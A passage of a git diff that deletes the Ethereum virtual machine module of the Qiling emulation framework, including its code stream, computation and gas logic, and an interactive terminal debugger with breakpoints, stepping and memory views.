ValidationError( - "The `configure_header` method may only be used with the fields " - f"({', '.join(tuple(sorted(ALLOWED_HEADER_FIELDS)))}). " - f"The provided fields ({', '.join(tuple(sorted(extra_fields)))}) are not supported" - ) diff --git a/qiling/arch/evm/vm/__init__.py b/qiling/arch/evm/vm/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/qiling/arch/evm/vm/code_stream.py b/qiling/arch/evm/vm/code_stream.py deleted file mode 100644 index aa16e06c6..000000000 --- a/qiling/arch/evm/vm/code_stream.py +++ /dev/null @@ -1,118 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import contextlib -import logging -from typing import ( - Iterator, - Set -) - -from ..abc import CodeStreamAPI -from ..validation import ( - validate_is_bytes, -) -from ..vm.opcode_values import ( - PUSH1, - PUSH32, - STOP, -) - - -class CodeStream(CodeStreamAPI): - __slots__ = ['_length_cache', '_raw_code_bytes', 'invalid_positions', 'valid_positions'] - - logger = logging.getLogger('eth.vm.CodeStream') - - def __init__(self, code_bytes: bytes) -> None: - validate_is_bytes(code_bytes, title="CodeStream bytes") - # in order to avoid method overhead when setting/accessing pc, we no longer fence - # the pc (Program Counter) into 0 <= pc <= len(code_bytes). We now let it float free. - # NOTE: Setting pc to a negative value has undefined behavior. - self.program_counter = 0 - self._raw_code_bytes = code_bytes - self._length_cache = len(code_bytes) - self.invalid_positions: Set[int] = set() - self.valid_positions: Set[int] = set() - - def read(self, size: int) -> bytes: - old_program_counter = self.program_counter - target_program_counter = old_program_counter + size - self.program_counter = target_program_counter - return self._raw_code_bytes[old_program_counter:target_program_counter] - - @property - def pc(self) -> int: - return self.program_counter - 1 - - def __len__(self) -> int: - return self._length_cache - - def __getitem__(self, i: int) -> int: - return self._raw_code_bytes[i] - - def __iter__(self) -> Iterator[int]: - # a very performance-sensitive method - pc = self.program_counter - while pc < self._length_cache: - opcode = self._raw_code_bytes[pc] - self.program_counter = pc + 1 - yield opcode - # a read might have adjusted the pc during the last yield - pc = self.program_counter - - yield STOP - - def peek(self) -> int: - pc = self.program_counter - if pc < self._length_cache: - return self._raw_code_bytes[pc] - else: - return STOP - - @contextlib.contextmanager - def seek(self, program_counter: int) -> Iterator['CodeStream']: - anchor_pc = self.program_counter - self.program_counter = program_counter - try: - yield self - finally: - self.program_counter = anchor_pc - - def _potentially_disqualifying_opcode_positions(self, position: int) -> Iterator[int]: - # Look at the last 32 positions (from 1 byte back to 32 bytes back). - # Don't attempt to look at negative positions. - deepest_lookback = min(32, position) - # iterate in reverse, because PUSH32 is more common than others - for bytes_back in range(deepest_lookback, 0, -1): - earlier_position = position - bytes_back - opcode = self._raw_code_bytes[earlier_position] - if PUSH1 + (bytes_back - 1) <= opcode <= PUSH32: - # that PUSH1, if two bytes back, isn't disqualifying - # PUSH32 in any of the bytes back is disqualifying - yield earlier_position - - def is_valid_opcode(self, position: int) -> bool: - if position >= self._length_cache: - return False - elif position in self.invalid_positions: - return False - elif position in self.valid_positions: - return True - else: - # An opcode is not valid, iff it is the "data" following a PUSH_ - # So we look at the previous 32 bytes (PUSH32 being the largest) to see if there - # is a PUSH_ before the opcode in this position. - for disqualifier in self._potentially_disqualifying_opcode_positions(position): - # Now that we found a PUSH_ before this position, we check if *that* PUSH is valid - if self.is_valid_opcode(disqualifier): - # If the PUSH_ valid, then the current position is invalid - self.invalid_positions.add(position) - return False - # Otherwise, keep looking for other potentially disqualifying PUSH_ codes - - # We didn't find any valid PUSH_ opcodes in the 32 bytes before position; it's valid - self.valid_positions.add(position) - return True diff --git a/qiling/arch/evm/vm/computation.py b/qiling/arch/evm/vm/computation.py deleted file mode 100644 index 18dc9682d..000000000 --- a/qiling/arch/evm/vm/computation.py +++ /dev/null @@ -1,478 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import itertools -# from qiling.core import Qiling -from types import TracebackType -from typing import ( - Any, - Callable, - Dict, - List, - Optional, - Tuple, - Type, - Union, -) - -from sys import version_info -if version_info.minor >= 8: - from functools import cached_property -else: - from cached_property import cached_property - -from eth_typing import Address - -from ..abc import ( - MemoryAPI, - StackAPI, - GasMeterAPI, - MessageAPI, - OpcodeAPI, - CodeStreamAPI, - ComputationAPI, - StateAPI, - TransactionContextAPI, -) -from ..constants import ( - GAS_MEMORY, - GAS_MEMORY_QUADRATIC_DENOMINATOR, -) -from ..exceptions import ( - Halt, - VMError, -) -from ..typing import BytesOrView -from .._utils.datatypes import Configurable -from .._utils.numeric import ceil32 -from ..validation import ( - validate_canonical_address, - validate_is_bytes, - validate_uint256, -) -from .code_stream import CodeStream -from .gas_meter import GasMeter -from .logic.invalid import InvalidOpcode -from .memory import Memory -from .message import Message -from .stack import Stack -from .disassembler import EVMDisasm -from ..hooks import evm_hooks_info -from .utils import analysis_bytecode, bytecode_to_bytes, runtime_code_detector - - -# def NO_RESULT(computation: ComputationAPI) -> None: -# """ -# This is a special method intended for usage as the "no precompile found" result. -# The type signature is designed to match the other precompiles. -# """ -# raise Exception("This method is never intended to be executed") - - -def memory_gas_cost(size_in_bytes: int) -> int: - size_in_words = ceil32(size_in_bytes) // 32 - linear_cost = size_in_words * GAS_MEMORY - quadratic_cost = size_in_words ** 2 // GAS_MEMORY_QUADRATIC_DENOMINATOR - - total_cost = linear_cost + quadratic_cost - return total_cost - - -class BaseComputation(Configurable, ComputationAPI): - """ - The base class for all execution computations. - - .. note:: - - Each :class:`~eth.vm.computation.BaseComputation` class must be configured with: - - ``opcodes``: A mapping from the opcode integer value to the logic function for the opcode. - - ``_precompiles``: A mapping of contract address to the precompile function for execution - of precompiled contracts. - """ - state: StateAPI = None - msg: MessageAPI = None - transaction_context: TransactionContextAPI = None - - _memory: MemoryAPI = None - _stack: StackAPI = None - _gas_meter: GasMeterAPI = None - - code: CodeStreamAPI = None - - children: List[ComputationAPI] = None - - _output: bytes = b'' - return_data: bytes = b'' - _error: VMError = None - - # TODO: use a NamedTuple for log entries - _log_entries: List[Tuple[int, Address, Tuple[int, ...], bytes]] = None - accounts_to_delete: Dict[Address, Address] = None - - # VM configuration - opcodes: Dict[int, OpcodeAPI] = None - _precompiles: Dict[Address, Callable[[ComputationAPI], ComputationAPI]] = None - - def __init__(self, - state: StateAPI, - message: MessageAPI, - transaction_context: TransactionContextAPI) -> None: - self.ql = state.ql - self.state = state - self.msg = message - self.transaction_context = transaction_context - - self._memory = Memory() - self._stack = Stack() - self._gas_meter = self.get_gas_meter() - - self.children = [] - self.accounts_to_delete = {} - self._log_entries = [] - - code = message.code - self.code = CodeStream(code) - - # - # Convenience - # - @property - def is_origin_computation(self) -> bool: - return self.msg.sender == self.transaction_context.origin - - # - # Error handling - # - @property - def is_success(self) -> bool: - return self._error is None - - @property - def is_error(self) -> bool: - return not self.is_success - - @property - def error(self) -> VMError: - if self._error is not None: - return self._error - raise AttributeError("Computation does not have an error") - - @error.setter - def error(self, value: VMError) -> None: - if self._error is not None: - raise AttributeError(f"Computation already has an error set: {self._error}") - self._error = value - - def raise_if_error(self) -> None: - if self._error is not None: - raise self._error - - @property - def should_burn_gas(self) -> bool: - return self.is_error and self._error.burns_gas - - @property - def should_return_gas(self) -> bool: - return not self.should_burn_gas - - @property - def should_erase_return_data(self) -> bool: - return self.is_error and self._error.erases_return_data - - # - # Memory Management - # - def extend_memory(self, start_position: int, size: int) -> None: - validate_uint256(start_position, title="Memory start position") - validate_uint256(size, title="Memory size") - - before_size = ceil32(len(self._memory)) - after_size = ceil32(start_position + size) - - before_cost = memory_gas_cost(before_size) - after_cost = memory_gas_cost(after_size) - - if size: - if before_cost < after_cost: - gas_fee = after_cost - before_cost - self._gas_meter.consume_gas( - gas_fee, - reason=" ".join(( - "Expanding memory", - str(before_size), - "->", - str(after_size), - )) - ) - - self._memory.extend(start_position, size) - - def memory_write(self, start_position: int, size: int, value: bytes) -> None: - return self._memory.write(start_position, size, value) - - def memory_read(self, start_position: int, size: int) -> memoryview: - return self._memory.read(start_position, size) - - def memory_read_bytes(self, start_position: int, size: int) -> bytes: - return self._memory.read_bytes(start_position, size) - - # - # Gas Consumption - # - def get_gas_meter(self) -> GasMeterAPI: - return GasMeter(self.msg.gas) - - def consume_gas(self, amount: int, reason: str) -> None: - return self._gas_meter.consume_gas(amount, reason) - - def return_gas(self, amount: int) -> None: - return self._gas_meter.return_gas(amount) - - def refund_gas(self, amount: int) -> None: - return self._gas_meter.refund_gas(amount) - - def get_gas_refund(self) -> int: - if self.is_error: - return 0 - else: - return self._gas_meter.gas_refunded + sum(c.get_gas_refund() for c in self.children) - - def get_gas_used(self) -> int: - if self.should_burn_gas: - return self.msg.gas - else: - return max( - 0, - self.msg.gas - self._gas_meter.gas_remaining, - ) - - def get_gas_remaining(self) -> int: - if self.should_burn_gas: - return 0 - else: - return self._gas_meter.gas_remaining - - # - # Stack management - # - def stack_swap(self, position: int) -> None: - return self._stack.swap(position) - - def stack_dup(self, position: int) -> None: - return self._stack.dup(position) - - # Stack manipulation is performance-sensitive code. - # Avoid method call overhead by proxying stack method directly to stack object - - @cached_property - def stack_pop_ints(self) -> Callable[[int], Tuple[int, ...]]: - return self._stack.pop_ints - - @cached_property - def stack_pop_bytes(self) -> Callable[[int], Tuple[bytes, ...]]: - return self._stack.pop_bytes - - @cached_property - def stack_pop_any(self) -> Callable[[int], Tuple[Union[int, bytes], ...]]: - return self._stack.pop_any - - @cached_property - def stack_pop1_int(self) -> Callable[[], int]: - return self._stack.pop1_int - - @cached_property - def stack_pop1_bytes(self) -> Callable[[], bytes]: - return self._stack.pop1_bytes - - @cached_property - def stack_pop1_any(self) -> Callable[[], Union[int, bytes]]: - return self._stack.pop1_any - - @cached_property - def stack_push_int(self) -> Callable[[int], None]: - return self._stack.push_int - - @cached_property - def stack_push_bytes(self) -> Callable[[bytes], None]: - return self._stack.push_bytes - - # - # Computation result - # - @property - def output(self) -> bytes: - if self.should_erase_return_data: - return b'' - else: - return self._output - - @output.setter - def output(self, value: bytes) -> None: - validate_is_bytes(value) - self._output = value - - # - # Runtime operations - # - def prepare_child_message(self, - gas: int, - to: Address, - value: int, - data: BytesOrView, - code: bytes, - **kwargs: Any) -> MessageAPI: - kwargs.setdefault('sender', self.msg.storage_address) - - child_message = Message( - gas=gas, - to=to, - value=value, - data=data, - code=code, - depth=self.msg.depth + 1, - **kwargs - ) - return child_message - - def apply_child_computation(self, child_msg: MessageAPI) -> ComputationAPI: - child_computation = self.generate_child_computation(child_msg) - self.add_child_computation(child_computation) - return child_computation - - def generate_child_computation(self, child_msg: MessageAPI) -> ComputationAPI: - if child_msg.is_create: - child_computation = self.apply_create_message( - self.state, - child_msg, - self.transaction_context, - ) - else: - child_computation = self.apply_message( - self.state, - child_msg, - self.transaction_context, - ) - return child_computation - - def add_child_computation(self, child_computation: ComputationAPI) -> None: - if child_computation.is_error: - if child_computation.msg.is_create: - self.return_data = child_computation.output - elif child_computation.should_burn_gas: - self.return_data = b'' - else: - self.return_data = child_computation.output - else: - if child_computation.msg.is_create: - self.return_data = b'' - else: - self.return_data = child_computation.output - self.children.append(child_computation) - - # - # Account management - # - def register_account_for_deletion(self, beneficiary: Address) -> None: - validate_canonical_address(beneficiary, title="Self destruct beneficiary address") - - if self.msg.storage_address in self.accounts_to_delete: - raise ValueError( - "Invariant. Should be impossible for an account to be " - "registered for deletion multiple times" - ) - self.accounts_to_delete[self.msg.storage_address] = beneficiary - - def get_accounts_for_deletion(self) -> Tuple[Tuple[Address, Address], ...]: - if self.is_error: - return tuple() - else: - return tuple(dict(itertools.chain( - self.accounts_to_delete.items(), - *(child.get_accounts_for_deletion() for child in self.children) - )).items()) - - # - # EVM logging - # - def add_log_entry(self, account: Address, topics: Tuple[int, ...], data: bytes) -> None: - validate_canonical_address(account, title="Log entry address") - for topic in topics: - validate_uint256(topic, title="Log entry topic") - validate_is_bytes(data, title="Log entry data") - self._log_entries.append( - (self.transaction_context.get_next_log_counter(), account, topics, data)) - - def get_raw_log_entries(self) -> Tuple[Tuple[int, bytes, Tuple[int, ...], bytes], ...]: - if self.is_error: - return () - else: - return tuple(sorted(itertools.chain( - self._log_entries, - *(child.get_raw_log_entries() for child in self.children) - ))) - - def get_log_entries(self) -> Tuple[Tuple[bytes, Tuple[int, ...], bytes], ...]: - return tuple(log[1:] for log in self.get_raw_log_entries()) - - # - # Context Manager API - # - def __enter__(self) -> ComputationAPI: - return self - - def __exit__(self, - exc_type: Optional[Type[BaseException]], - exc_value: Optional[BaseException], - traceback: Optional[TracebackType]) -> Union[None, bool]: - if exc_value and isinstance(exc_value, VMError): - self._error = exc_value - if self.should_burn_gas: - self.consume_gas( - self._gas_meter.gas_remaining, - reason=" ".join(( - "Zeroing gas due to VM Exception:", - str(exc_value), - )), - ) - - # suppress VM exceptions - return True - return None - - # - # disassembly - # - @property - def disasm(self): - if self.msg.is_create: - load_bytecode, runtime_code, _, _ = analysis_bytecode(self.msg.code) - code = CodeStream(bytecode_to_bytes(load_bytecode + runtime_code)) - else: - if self.msg.depth > 0: - runtime_code, _, _ = runtime_code_detector(self.msg.code) - code = bytecode_to_bytes(runtime_code) - code = CodeStream(code) - else: - code = CodeStream(self.msg.code) - - return EVMDisasm().disasm(code, evm_hooks_info) - - # - # Opcode API - # - @property - def precompiles(self) -> Dict[Address, Callable[[ComputationAPI], Any]]: - if self._precompiles is None: - return dict() - else: - return self._precompiles - - def get_opcode_fn(self, opcode: int) -> OpcodeAPI: - try: - return self.opcodes[opcode] - except KeyError: - return InvalidOpcode(opcode) diff --git a/qiling/arch/evm/vm/dbgcui.py b/qiling/arch/evm/vm/dbgcui.py deleted file mode 100644 index b1c2daf8e..000000000 --- a/qiling/arch/evm/vm/dbgcui.py +++ /dev/null @@ -1,266 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from rich import box -from rich import print as rprint -from rich.align import Align -from rich.console import Console, Group -from rich.layout import Layout -from rich.panel import Panel -from rich.syntax import Syntax -from rich.table import Table - - -console = Console() - -def hexdump(src, length=16, sep='.', minrows=8, start=0, prevsrc="", to_list=False): - """ - @brief Return {src} in hex dump. - """ - txt = lambda c: chr(c) if 0x20 <= c < 0x7F else "." - - result = [] - result.append(' 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F | [ --ascii--]') - result.append('') - rows = [] - - for i in range(16): - subSrc = src[2 * (start * 16 + i * 16):2 * (start * 16 + i * 16) + length * 2] - hexa = '' - text = '' - if len(subSrc) > 0: - for h in range(0, len(subSrc), 2): - if h == length: - hexa += ' ' - byte = int(subSrc[h:h + 2], 16) - - # Check if it changed from op before - changed = False - if prevsrc is not None: - index = 2 * (start + i) * 16 + h - if index + 2 > len(prevsrc): - changed = True - elif int(prevsrc[index:index + 2], 16) != byte: - changed = True - - if changed: - hexa += "{:02x} ".format(byte) - else: - hexa += "{:02x} ".format(byte) - text += txt(byte) - - rows.append('{:08x}: {:<49} | {:<16} '.format(16 * (start + i), hexa, text)) - if len(rows) == minrows: - break - result.extend(rows) - if to_list: - return result - return '\n'.join(result) - -def stackdump(src, minrows=8, to_list=False): - result = [] - - # only the last N elements should be printed - start = len(src) - min(minrows, len(src)) - for i in range(min(minrows, len(src)) + start - 1, start - 1, -1): - v_type = src[i][0] - value = src[i][1] - if v_type is bytes: - val = int(value.hex(), 16) - elif v_type is int: - val = value - else: - val = int(value[2:], 16) - - if i < len(src): - stackvalue = " {:02} : {:.>64x}".format(i, val) - else: - stackvalue = " {:02} : {:64}".format(i, "") - - result.append(stackvalue) - - if to_list: - return result - return '\n'.join(result) - - -def make_layout() -> Layout: - """Define the layout.""" - layout = Layout(name="root") - - layout.split( - Layout(name="header", ratio=1), - Layout(name="main", ratio=15), - Layout(name="footer", ratio=4), - ) - layout["main"].split_row( - Layout(name="body", ratio=10), - Layout(name="side", ratio=15) - ) - layout["side"].split(Layout(name="box1", minimum_size=15, ratio=10), Layout(name="box2", ratio=10), Layout(name="box3", ratio=15)) - return layout - -def make_disasm_panel(debugger) -> Panel: - code = '' - front_num = 10 - pc = debugger.executor.vm_context.code.pc + 1 - current_insn_index = 0 - - for i, k in enumerate(debugger.executor.disasm_dict): - if k >= pc: - current_insn_index = i - break - - begin_index = max(current_insn_index-front_num, 0) - show_disasm_list = list(debugger.executor.disasm_dict.values())[begin_index:] - index = 0 - for insn in show_disasm_list: - if index >= 100: - break - if insn.pc == pc: - code += f'[b red][{insn.pc}] {insn.byte} {insn.mnemonic} {insn.imm_op}[/b red]\n' - else: - code += f'[b blue][{insn.pc}] {insn.byte} {insn.mnemonic} {insn.imm_op}[/b blue]\n' - index += 1 - - # syntax = Syntax(code, "default", line_numbers=False) - return Panel(code, border_style="green", title="[b red]Disassembly") - -def make_memory_panel(debugger) -> Panel: - addr = 0 - mem_bytes = debugger.executor.vm_context.memory_read_bytes(0, 16*8) - byte = ''.join(['%02X' % b for b in mem_bytes]) - res = hexdump(byte, start=int(addr), to_list=True) - mem_table = Table.grid(padding=0) - - for i in res: - mem_table.add_row(i) - - memory_panel = Panel( - Align.center( - Group('', "\n", Align.center(mem_table)), - vertical="top", - ), - box=box.ROUNDED, - padding=(0, 1), - title="[b red]Memory", - border_style="bright_blue", - ) - return memory_panel - -def make_stack_panel(debugger) -> Panel: - stack_table = stackdump(debugger.executor.vm_context._stack.values) - - stack_panel = Panel( - Align.center(stack_table), - box=box.ROUNDED, - padding=(1, 1), - title="[b red]Stack", - border_style="bright_blue", - ) - return stack_panel - -def make_info_panel(debugger) -> Layout: - info_layout = Layout(name='Info') - info_layout.split_row( - Layout(name='runtime_state'), - Layout(name='world_state') - ) - - pc = debugger.executor.vm_context.code.pc + 1 - insn = debugger.executor.disasm_dict[pc] - opcode = insn.byte - mnemonic = insn.mnemonic - msg = debugger.executor.vm_context.msg - info_table = Table(box=box.SIMPLE) - info_table.grid(padding=1) - info_table.add_column('Key', justify="middle", style="cyan", no_wrap=True) - info_table.add_column("Value", justify="middle", style="magenta") - info_table.add_row('PC', f'{str(pc)} ({hex(pc)})') - info_table.add_row('Opcode', f'{int(opcode[2:], 16)} ({opcode})') - info_table.add_row('Mnemonic', f'{mnemonic}') - info_table.add_row('', '') - info_table.add_row('Sender', f'0x{msg.sender.hex()}') - if msg.to: - info_table.add_row('To', f'0x{msg.to.hex()}') - elif msg.storage_address: - info_table.add_row('To', f'0x{msg.storage_address.hex()}') - elif msg.code_address: - info_table.add_row('To', f'0x{msg.code_address.hex()}') - info_table.add_row('Gas Price', str(msg.gas_price)) - info_table.add_row('Nonce', str(debugger.executor.vm_context.msg.depth)) - - info_panel = Panel( - info_table, - box=box.ROUNDED, - title="[b red]Runtime State", - border_style="bright_blue", - ) - - - state = debugger.executor.vm_context.state - world_state_table = Table(box=box.SIMPLE) - world_state_table.grid(padding=1) - world_state_table.add_column('Key', justify="middle", style="cyan", no_wrap=True) - world_state_table.add_column("Value", justify="middle", style="magenta") - world_state_table.add_row('coinbase', f'{state.coinbase.hex()}') - world_state_table.add_row('timestamp', f'{state.timestamp}') - world_state_table.add_row('block_number', f'{state.block_number}') - world_state_table.add_row('difficulty', f'{state.difficulty}') - world_state_table.add_row('gas_limit', f'{state.gas_limit}') - - - world_state_panel = Panel( - world_state_table, - box=box.ROUNDED, - title="[b red]World State", - border_style="bright_blue", - ) - - info_layout["runtime_state"].update(info_panel) - info_layout["world_state"].update(world_state_panel) - - return info_layout - -def make_funcsign_panel(debugger) -> Panel: - funcsign_table = Table(box=box.SIMPLE) - funcsign_table.grid(padding=2) - funcsign_table.add_column('Xref', justify="middle", style="cyan", no_wrap=True) - funcsign_table.add_column("Sign", justify="middle", style="magenta") - funcsign_table.add_column("Name", justify="middle", style="magenta") - funcsign_table.add_column("Prefered_name", justify="middle", style="magenta") - funcsign_table.add_column("Most_prefered_name", justify="middle", style="magenta") - - for i in debugger.func_sign: - prefered_name = ' '.join(i.prefered_name) - most_prefered_name = ' '.join(i.most_prefered_name) - funcsign_table.add_row(str(i.xref), str(i.sign), i.name, prefered_name, most_prefered_name) - - funcsign_panel = Panel( - funcsign_table, - box=box.ROUNDED, - padding=(1, 1), - title="[b red]Function Sign", - border_style="bright_blue", - ) - return funcsign_panel - -def main_output(debugger): - console.clear() - # title_padding = Padding('', (2, 1)) - # rprint(title_padding) - # console.rule('EVM Dynamic Debugger') - header_padding = Panel('', box=box.MINIMAL) - - layout = make_layout() - layout["header"].update(header_padding) - layout["body"].update(make_disasm_panel(debugger)) - layout["box1"].update(make_memory_panel(debugger)) - layout["box2"].update(make_stack_panel(debugger)) - layout["box3"].update(make_funcsign_panel(debugger)) - layout["footer"].update(make_info_panel(debugger)) - - # print(layout) - return layout diff --git a/qiling/arch/evm/vm/debug.py b/qiling/arch/evm/vm/debug.py deleted file mode 100644 index 319aba92d..000000000 --- a/qiling/arch/evm/vm/debug.py +++ /dev/null @@ -1,313 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import os, time -import cmd2 -from rich import print as rprint -from ..hooks import evm_hooks_info -from .disassembler import EVMDisasm -from ..analysis.signatures import analysis_func_sign -from .utils import analysis_bytecode, bytecode_to_bytes -from .exec import EVMExecutor, debug_cmd_history -from .dbgcui import * - - -class EVMDebugger(cmd2.Cmd): - def __init__(self, executor:EVMExecutor) -> None: - shortcuts = cmd2.DEFAULT_SHORTCUTS - extra_shortcuts = { - 'ct': 'continue', - 'si': 'stepinto', - 'bc': 'bytecode', - 'mem': 'memory', - 'bp': 'break', - 'ds': 'disasm', - 'cls': 'clear', - 'rr': 'refresh' - } - shortcuts.update(extra_shortcuts) - super().__init__(shortcuts=shortcuts) - self.init(executor) - - def init(self, executor): - self.executor:EVMExecutor = executor - self.executor.is_debug = True - self.bp_list = [] - - load_bytecode, runtime_code, aux_data, constructor_args = analysis_bytecode(self.executor.vm_context.msg.code) - - insns = EVMDisasm().disasm(bytecode_to_bytes(runtime_code), evm_hooks_info) - self.func_sign = analysis_func_sign(insns, engine_num=2) - - self.cli_output() - - # override - def _cmdloop(self) -> None: - """Repeatedly issue a prompt, accept input, parse an initial prefix - off the received input, and dispatch to action methods, passing them - the remainder of the line as argument. - - This serves the same role as cmd.cmdloop(). - """ - saved_readline_settings = None - - try: - # Get sigint protection while we set up readline for cmd2 - with self.sigint_protection: - saved_readline_settings = self._set_up_cmd2_readline() - - # Run startup commands - stop = self.runcmds_plus_hooks(self._startup_commands) - self._startup_commands.clear() - - while not stop: - # Get commands from user - try: - if debug_cmd_history and debug_cmd_history[-1].startswith(('ct ', 'continue ')) and self.executor.vm_context.msg.depth != 0: - line = debug_cmd_history[-1] - else: - line = self._read_command_line(self.prompt) - debug_cmd_history.append(str(line)) - except KeyboardInterrupt: - self.poutput('^C') - line = '' - - # Run the command along with all associated pre and post hooks - stop = self.onecmd_plus_hooks(line) - finally: - # Get sigint protection while we restore readline settings - with self.sigint_protection: - if saved_readline_settings is not None: - self._restore_readline(saved_readline_settings) - - # Cmd UI - def cli_output(self): - rprint(main_output(self)) - - - clear_parser = cmd2.Cmd2ArgumentParser() - - @cmd2.with_argparser(clear_parser) - def do_clear(self, opt): - """clear screen""" - os.system('cls' if os.name == 'nt' else 'clear') - - - continue_parser = cmd2.Cmd2ArgumentParser() - continue_parser.add_argument('-sleep', type=float) - - @cmd2.with_argparser(continue_parser) - def do_continue(self, opt): - """continue execute""" - if self.exit_code and self.executor.vm_context.msg.depth == 0: - rprint('Smart Contract exec finished, use `quit` to exit cmd.') - else: - if opt.sleep: - time.sleep(opt.sleep) - _, is_func_end = self.executor.execute(self.bp_list) - if opt.sleep: - time.sleep(opt.sleep) - self.cli_output() - if is_func_end: - self.exit_code = 1 - if self.executor.vm_context.msg.depth != 0: - return True - rprint('Smart Contract exec finished, use `quit` to exit cmd.') - - - stepinto_parser = cmd2.Cmd2ArgumentParser() - - @cmd2.with_argparser(stepinto_parser) - def do_stepinto(self, opt): - """step into""" - if self.exit_code: - rprint('Smart Contract exec finished, use `quit` to exit cmd.') - else: - # try: - opcode = int.from_bytes(self.executor.vm_context.code.read(1), byteorder='little') - is_break = self.executor.execute_once(opcode) - if is_break: - self.exit_code = 1 - rprint('Smart Contract exec finished, use `quit` to exit cmd.') - self.cli_output() - # except: - # self.exit_code = 1 - # rprint('Smart Contract exec exception, use `quit` to exit cmd.') - - - break_parser = cmd2.Cmd2ArgumentParser() - break_parser.add_argument('addr', type=str, help='address') - - @cmd2.with_argparser(break_parser) - def do_break(self, opt): - """set breakpoint at address""" - if opt.addr.startswith('0x'): - addr = int(opt.addr[2:], 16) - else: - addr = int(opt.addr) - self.bp_list.append(addr) - - - info_parser = cmd2.Cmd2ArgumentParser() - info_subparsers = info_parser.add_subparsers() - - info_bytecode_parser = info_subparsers.add_parser('bytecode', help='View bytecode in MemoryView') - info_bytecode_parser.add_argument('-addr', type=str, help='address') - - info_memory_parser = info_subparsers.add_parser('memory', help='View memory in MemoryView') - info_memory_parser.add_argument('-addr', type=str, help='address') - - info_breakpoint_parser = info_subparsers.add_parser('breakpoint', help='View all current breakpoints') - - def tohex(self, cmds, byte): - addr = None - if cmds.addr: - addr = cmds.addr - if addr: - rprint(hexdump(byte, start=int(addr))) - return - rprint(hexdump(byte)) - - def info_bytecode(self, opt): - code = ''.join(['%02X' % b for b in self.executor.vm_context.msg.code]) - self.tohex(opt, code) - - def info_memory(self, opt): - if opt.addr: - mem_bytes = self.executor.vm_context.memory_read_bytes(int(opt.addr), 16*8) - else: - mem_bytes = self.executor.vm_context.memory_read_bytes(0, 16*8) - mem = ''.join(['%02X' % b for b in mem_bytes]) - self.tohex(opt, mem) - - def info_breakpoint(self, opt): - i = 0 - for bp in self.bp_list: - rprint(f'breakpoint{i}: {hex(bp)}') - i += 1 - - info_bytecode_parser.set_defaults(func=info_bytecode) - info_memory_parser.set_defaults(func=info_memory) - info_breakpoint_parser.set_defaults(func=info_breakpoint) - - @cmd2.with_argparser(info_parser) - def do_info(self, args): - """check informetion""" - func = getattr(args, 'func', None) - if func is not None: - func(self, args) - else: - self.do_help('info') - - - disasm_parser = cmd2.Cmd2ArgumentParser() - disasm_parser.add_argument('-count', type=int, help='the number of disassembly lines') - disasm_parser.add_argument('-frontcount', type=int, help='the number of behind disassembly lines') - - @cmd2.with_argparser(disasm_parser) - def do_disasm(self, opt): - num = 10 - front_num = 3 - if opt.count: - num = opt.count - if opt.frontcount: - front_num = opt.frontcount - - pc = self.executor.vm_context.code.pc + 1 - current_insn_index = 0 - - for i, k in enumerate(self.executor.disasm_dict): - if k >= pc: - current_insn_index = i - break - - begin_index = max(current_insn_index-front_num, 0) - show_disasm_list = list(self.executor.disasm_dict.values())[begin_index:] - index = 0 - - for insn in show_disasm_list: - if index >= num + 1: - break - rprint(f'[{insn.pc}] {insn.byte} {insn.mnemonic} {insn.imm_op}') - index += 1 - - - auto_parser = cmd2.Cmd2ArgumentParser() - auto_parser.add_argument('-count', type=int, help='how many times you want to auto step, default exec to the end') - auto_parser.add_argument('-sleep', type=float, help='The number of seconds between steps') - - @cmd2.with_argparser(auto_parser) - def do_auto(self, opt): - sleep_time = 1 - if opt.sleep: - sleep_time = opt.sleep - if opt.count: - for i in range(opt.count): - self.onecmd('si', add_to_history=False) - time.sleep(sleep_time) - if self.exit_code == 1: - break - else: - while 1: - self.onecmd('si', add_to_history=False) - time.sleep(sleep_time) - if self.exit_code == 1: - break - - write_parser = cmd2.Cmd2ArgumentParser() - write_subparsers = write_parser.add_subparsers() - - write_stack_parser = write_subparsers.add_parser('stack', help='write stack data') - write_stack_parser.add_argument('index', type=int) - write_stack_parser.add_argument('value', type=str, help='must be hex') - - write_memory_parser = write_subparsers.add_parser('memory', help='write memory data') - write_memory_parser.add_argument('addr', type=str, help='must be hex') - write_memory_parser.add_argument('value', type=str, help='must be hex') - - def write_stack(self, opt): - values = self.executor.vm_context._stack.values - val = int(opt.value[2:], 16) if opt.value.startswith('0x') else int(opt.value, 16) - try: - if opt.index >= len(values): - values.append((int, val)) - else: - values[opt.index] = (int, val) - self.executor.vm_context._stack.values = values - except: - rprint('Input Error, value must be int type') - - def write_memory(self, opt): - addr = int(opt.addr[2:], 16) if opt.addr.startswith('0x') else int(opt.addr, 16) - val = bytecode_to_bytes(opt.value) - - self.executor.vm_context.extend_memory(addr, len((val))) - self.executor.vm_context.memory_write(addr, len(val), val) - - write_stack_parser.set_defaults(func=write_stack) - write_memory_parser.set_defaults(func=write_memory) - - @cmd2.with_argparser(write_parser) - def do_write(self, args): - """write struction""" - func = getattr(args, 'func', None) - if func is not None: - func(self, args) - else: - self.do_help('write') - - - refresh_parser = cmd2.Cmd2ArgumentParser() - - @cmd2.with_argparser(refresh_parser) - def do_refresh(self, opt): - self.cli_output() - - - -def run_debugger(executor): - app = EVMDebugger(executor) - res = app.cmdloop() - return app.executor.vm_context diff --git a/qiling/arch/evm/vm/defaultconf.py b/qiling/arch/evm/vm/defaultconf.py deleted file mode 100644 index c4703e415..000000000 --- a/qiling/arch/evm/vm/defaultconf.py +++ /dev/null @@ -1,19 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from .host import QlArchEVMHostInfo -from .. import constants as eth_constants -from .. import constants - - -MAINNET_GENESIS_HOST = QlArchEVMHostInfo( - coinbase=constants.ZERO_ADDRESS, - timestamp=100*10**18, - block_number=0, - difficulty=eth_constants.GENESIS_DIFFICULTY, - gas_limit=eth_constants.GENESIS_GAS_LIMIT, - prev_hashes=constants.ZERO_HASH32, - chain_id=1, -) diff --git a/qiling/arch/evm/vm/disassembler.py 